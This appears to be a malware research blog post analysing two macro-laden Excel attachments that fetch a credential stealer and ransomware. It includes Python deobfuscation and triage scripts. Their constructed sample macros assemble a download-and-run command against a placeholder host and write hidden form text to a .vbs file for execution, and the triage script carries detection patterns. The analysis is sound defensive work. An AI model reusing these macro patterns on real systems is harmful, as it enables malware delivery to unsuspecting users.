by RSS Xiaopeng Zhang  |  Mar 08, 2017  |  Filed in: Security Research

Over the last few years we have seen many emails carrying Word attachments that spread malware. Spreading malware through malicious Excel files now appears to be growing in popularity as well. Lately, Fortinet has collected a number of email samples with Excel attachments (.xls, .xlsm) that deliver malware by executing malicious VBA (Visual Basic for Applications) code.

VBA is the programming language built into the Microsoft Office suite. It is normally used to automate tasks in Excel and the other Office applications, which is exactly why a workbook can carry executable code.

I’ll use two examples to explain how Excel files can be used to spread malware.

Excel Malware Sample 1

When the malicious file is opened in Excel, a security warning bar prompts the user to click the “Enable Content” button. Macros are disabled by default, so nothing runs until the user does so; once macros are enabled, the malicious VBA code inside the sample executes. See Figure 1.

Figure 1. An Excel message to enable macros


The file in this example is an OLE (compound file) format Excel workbook collected on Feb 27, 2017. Its original file name is “payment.xls”; Fortinet detects it as “WM/Agent.D9E2!tr.dldr” because of the malicious VBA code it contains.

  • Here is the OLE structure of this sample

Figure 2. The OLE structure of this sample

The OLE analysis tool shows that the malicious VBA code lives in the Module1 stream (VBA source is stored compressed inside module streams, so it has to be decompressed rather than read raw), so I extracted the code from there.

  • Here is the VBA code snippet

As the VBA code shows, there is a procedure named “Auto_Open”, which Excel runs automatically when the workbook is opened (once macros are enabled). It is the legacy auto-run hook; the “Workbook_Open” event handler used by the second sample below serves the same purpose. Based on our analysis of other malicious VBA samples, the functions “ShellExecute”, “Shell”, “WScript.Shell”, and “Run” are the usual ways to launch an external command: “Shell” is a built-in VBA function, “ShellExecute” is a Win32 API imported with a Declare statement, and “Run” is a method of the “WScript.Shell” COM object. In this sample, the “Shell” call at the bottom executes the malicious command.

The VBA code is easy to follow. First, it creates several arrays with short, random-looking names by calling the Array function. Second, it builds intermediate strings by concatenating array elements selected by index. Finally, it joins those strings in a specific order to produce the final command string.

This is a simple string-obfuscation technique meant to evade signature detection and slow down analysis: the command never appears as a contiguous string anywhere in the module. The final string is the malicious command executed by the “Shell” function; in this sample the first argument, the variable “ugsubpox”, holds the command string.

  • Debugging the VBA code with Microsoft Visual Basic for Applications

Figure 3. Analyzing the VBA code

  • Downloading other malware

As analyzed in Figure 3, here is the string in the variable “ugsubpox”:

It looks strange because of the obfuscation. We can see that a command line will be run through cmd.exe. The many ‘^’ characters are cmd.exe escape characters: outside double quotes, ‘^’ makes the following character literal and is itself dropped by the command parser, so sprinkling it between letters changes nothing about what runs while breaking simple string matching. Two caveats when cleaning such strings by hand: ‘^^’ stands for a literal ‘^’, and carets inside double quotes are kept as ordinary characters. After removing the carets and folding everything to lowercase, which is safe for reading because cmd.exe commands and Windows file names are case-insensitive, the string is much clearer and easier to understand:

“cmd.exe /c” starts a new command interpreter, runs the command given in the string, and then exits. Executing this command downloads an .exe file to “%appdata%.exe” and runs it.
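The two manual steps above (rebuilding the string the macro hands to Shell, then undoing the caret escaping) can be scripted. The following Python is an added example, not code from this post or from the sample: the macro it parses is a constructed imitation of the Array()/index pattern described above with a placeholder URL (example.invalid) and placeholder file names, and the emulator handles only that pattern, not arbitrary VBA.

```python
"""Recover the command a VBA macro builds from Array() pieces and hands to
Shell, then undo cmd.exe caret escaping. Added example: the macro below is a
constructed imitation of the pattern described in the post, not the sample."""
import re

# Constructed macro text (not the real payment.xls code); URL and file names
# are placeholders.
SAMPLE_VBA = r'''
Sub Auto_Open()
    qz = Array("C^M", "d.e^X", "e /c ", "sta^rt ", "/b ")
    kr = Array("P^Ower", "S^hell ", "-w 1 ", "-c ")
    yt = Array("iwr http://example.invalid/bin ", "-o %APPDATA%\up.exe", ";", "%APPDATA%\up.exe")
    p1 = qz(0) & qz(1) & qz(2)
    p2 = kr(3) & yt(0) & yt(1)
    ugsubpox = p1 & qz(3) & qz(4) & kr(0) & kr(1) & kr(2) & p2 & yt(2) & yt(3)
    Shell ugsubpox, vbHide
End Sub
'''

ARRAY_RE = re.compile(r'^\s*(\w+)\s*=\s*Array\((.*)\)\s*$')
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
SHELL_RE = re.compile(r'^\s*(?:Call\s+)?Shell\b\s*\(?\s*(\w+)', re.IGNORECASE)
STR_RE = re.compile(r'"((?:[^"]|"")*)"')
TOKEN_RE = re.compile(r'"(?:[^"]|"")*"|\w+\(\d+\)|\w+')


def vba_literals(text):
    """All "..." literals in text; a doubled quote inside a literal is one quote."""
    return [m.group(1).replace('""', '"') for m in STR_RE.finditer(text)]


def eval_expr(expr, arrays, strings):
    """Evaluate a chain of & terms: literals, arr(idx) lookups, string variables."""
    parts = []
    for tok in TOKEN_RE.findall(expr):
        if tok.startswith('"'):
            parts.append(tok[1:-1].replace('""', '"'))
        elif tok.endswith(')'):
            name, idx = tok[:-1].split('(')
            parts.append(arrays[name][int(idx)])
        else:
            parts.append(strings[tok])
    return ''.join(parts)


def emulate(vba):
    """Statically evaluate the macro's string building and return the string
    that reaches Shell. Deliberately minimal: Array(), indexing, & and plain
    assignments only; no loops, Chr() tricks or line continuations."""
    arrays, strings, shell_var = {}, {}, None
    for line in vba.splitlines():
        m = ARRAY_RE.match(line)
        if m:
            arrays[m.group(1)] = vba_literals(m.group(2))
            continue
        m = SHELL_RE.match(line)
        if m:
            shell_var = m.group(1)
            continue
        m = ASSIGN_RE.match(line)
        if m:
            strings[m.group(1)] = eval_expr(m.group(2), arrays, strings)
    if shell_var is None:
        raise ValueError("no Shell call found")
    return strings[shell_var]


def decaret(cmd):
    """Undo cmd.exe escaping the way its parser does: outside double quotes a
    caret makes the next character literal and is dropped (so ^^ -> ^);
    inside double quotes carets are ordinary characters and are kept."""
    out, in_quote, i = [], False, 0
    while i < len(cmd):
        c = cmd[i]
        if c == '"':
            in_quote = not in_quote
            out.append(c)
        elif c == '^' and not in_quote and i + 1 < len(cmd):
            out.append(cmd[i + 1])
            i += 1
        else:
            out.append(c)
        i += 1
    return ''.join(out)


def recover_command(vba):
    """Emulate the macro, then de-escape. Case is preserved on purpose: cmd.exe
    is case-insensitive, but URL paths and some program arguments are not, so
    fold to lowercase only for reading, never before extracting IOCs."""
    return decaret(emulate(vba))


if __name__ == "__main__":
    raw = emulate(SAMPLE_VBA)
    print("as built  :", raw)
    print("de-escaped:", decaret(raw))
    print("lowercase :", decaret(raw).lower())
```

Running the script prints the command as the macro assembles it, the same command with the carets resolved, and a lowercase copy for reading. The de-escaping follows cmd.exe's own rules rather than a blanket `replace("^", "")`, which would corrupt a literal `^^` or a caret inside quotes.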

The downloaded .exe is itself a downloader for the Dyzap malware family. It fetches a further executable, served under the name “paray.txt”, which is a new Dyzap variant, and runs it to keep stealing credentials from the infected system. The stolen credentials are then encrypted and sent to the C&C server.

For more information about Dyzap, you can read the blog from Bahare Sabouri and He Xu.  

In our collection system we have gathered many Excel samples containing similar VBA code. They are used to spread different kinds of malware, including trojans, ransomware, spyware, and bots.

Excel Malware Sample 2

Another Excel malware sample was first collected in our system on Feb 27, 2017. It’s also an OLE format file.

  • The OLE structure of this sample

This sample contains modules and controls. Here is its structure.

Figure 4. The OLE structure of this sample

From the parsing result of the OLE file analysis tool, we can see the VBA code is stored in the streams “_VBA_PROJECT_CUR/VBA/ThisWorkbook”, “_VBA_PROJECT_CUR/VBA/Module1”, and “_VBA_PROJECT_CUR/UserForm1/o”. The VBA project contains a UserForm with a “TextBox” control, and the control's “Text” property holds the malicious code. Because form control data lives in the form's “o” stream rather than in the macro source, it is invisible by default and is missed by tools that only dump the module streams, yet the VBA code can read it simply by referencing the property. See Figure 5, below.

Figure 5. Malicious code hidden in TextBox control

Once this sample is opened in Excel and macros are enabled, the “Workbook_Open” event handler in the “ThisWorkbook” stream is called. Its VBA code extracts the hidden script from the stream “_VBA_PROJECT_CUR/UserForm1/o” (by reading the TextBox's Text property), writes it to a file called “gtls.vbs”, and then executes it.

  • The VBA code extracting vbs code from TextBox control into “gtls.vbs”

  • Here is the code of “gtls.vbs”

The script is straightforward. When executed, it downloads a file from “hxxp://****anox.comxa.com/dix/disk” to “%appdata%\disk.exe”, then launches “disk.exe” through “oShell.Run”, the “Run” method of a “WScript.Shell” object. See Figure 6, below.

Figure 6. The properties of the downloaded file

After a quick analysis we can see that this is a new variant of Strictor, a ransomware family. Fortinet detects it as “W32/Delf.EFUQ!tr”.
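The indicators that recur across both samples (an auto-run entry point, a Shell/WScript.Shell/Run call, Array()-index string building, a form control's Text property being read, a script written to a profile or temp path) are easy to check mechanically on extracted VBA. The triage script below is an added example, not code from this post: the indicator list follows the behaviours described above, the weights and thresholds are arbitrary illustration values, and the three macros it scores are constructed stand-ins modelled on the two samples and on a harmless spreadsheet macro, not the real samples.

```python
"""Heuristic triage of extracted VBA source. Added example, not code from the
post: indicators follow the behaviours described for the two samples, weights
and thresholds are arbitrary, and the three macros are constructed stand-ins."""
import re

# (label, pattern, weight). The weight is added once per label that matches.
INDICATORS = [
    ("auto-run entry point",  r'\b(?:Auto_Open|Workbook_Open|Document_Open|AutoOpen)\b', 3),
    ("command execution",     r'\b(?:Shell|ShellExecute|WScript\.Shell)\b|\.Run\b', 3),
    ("Array() string pieces", r'\bArray\s*\(\s*"', 2),
    ("index concatenation",   r'\w+\(\d+\)\s*&\s*\w+\(\d+\)', 2),
    ("form control text",     r'\b\w+\.(?:Text|Caption|Tag|ControlTipText)\b', 1),
    ("script file name",      r'\.(?:vbs|vbe|js|jse|bat|cmd|ps1)\b', 2),
    ("file write",            r'\bFor\s+(?:Output|Binary|Append)\b|\b(?:CreateTextFile|SaveToFile)\b', 2),
    ("profile/temp path",     r'\bEnviron\s*\(|%(?:APPDATA|TEMP|TMP)%', 1),
]

# Auto-run plus execution is the pairing that turns "Enable Content" into code
# execution, so it earns a bonus on top of the individual weights.
COMBO_BONUS = 3


def triage(vba_source):
    """Score one VBA module. Returns {'score': int, 'hits': {label: [matches]}}."""
    hits, score = {}, 0
    for label, pattern, weight in INDICATORS:
        found = re.findall(pattern, vba_source, flags=re.IGNORECASE)
        if found:
            hits[label] = found
            score += weight
    if "auto-run entry point" in hits and "command execution" in hits:
        score += COMBO_BONUS
    return {"score": score, "hits": hits}


def verdict(score):
    """Arbitrary thresholds for illustration; tune them against your own corpus."""
    if score >= 8:
        return "malicious"
    if score >= 4:
        return "suspicious"
    return "clean"


# Constructed stand-ins (not the real samples). SAMPLE1_STYLE mimics the
# Array()/index builder handed to Shell; SAMPLE2_STYLE mimics reading a hidden
# TextBox and writing it out as a .vbs; BENIGN is an ordinary worksheet macro.
SAMPLE1_STYLE = r'''
Sub Auto_Open()
    qz = Array("C^M", "d.e^X", "e /c ")
    kr = Array("sta^rt ", "/b ", "%APPDATA%\up.exe")
    ugsubpox = qz(0) & qz(1) & qz(2) & kr(0) & kr(1) & kr(2)
    Shell ugsubpox, vbHide
End Sub
'''

SAMPLE2_STYLE = r'''
Private Sub Workbook_Open()
    Dim p As String
    p = Environ("TEMP") & "\gtls.vbs"
    Open p For Output As #1
    Print #1, UserForm1.TextBox1.Text
    Close #1
    CreateObject("WScript.Shell").Run p, 0, False
End Sub
'''

BENIGN = r'''
Sub TotalSales()
    Dim r As Range
    Set r = Worksheets("Sales").Range("B2:B100")
    Worksheets("Sales").Range("B101").Value = WorksheetFunction.Sum(r)
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample1", SAMPLE1_STYLE), ("sample2", SAMPLE2_STYLE), ("benign", BENIGN)):
        r = triage(src)
        print(f"{name}: {verdict(r['score'])} (score {r['score']}): {sorted(r['hits'])}")
```

The point of scoring labels rather than raw match counts is that one obfuscated macro can contain hundreds of `a(3) & b(7)` pairs; what matters for triage is which behaviours are present together, which is why the auto-run/execution pairing is weighted separately. Feed it the output of any VBA extractor, and remember from sample 2 that the module streams alone may not contain the payload: form control text in the UserForm's “o” stream has to be dumped too.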

Conclusion

Based on our observations, the number and variety of malware families spread through Microsoft Office files, like the two Excel samples shown above, is increasing. To protect against them, users should be very careful with Microsoft Office attachments from untrusted sources, and in particular should not click “Enable Content” on a document that asks for it: both samples above are inert until macros are enabled.

Excel Sample SHA256s:

0abdc28b70c032810ac5a3de80f1b40fd740ad5fc1dbe033a12103e16a66f15d
898d137e4d676ac02ff83c607abbe24a8187e1fcda895b100f157e2eb8d9dffb
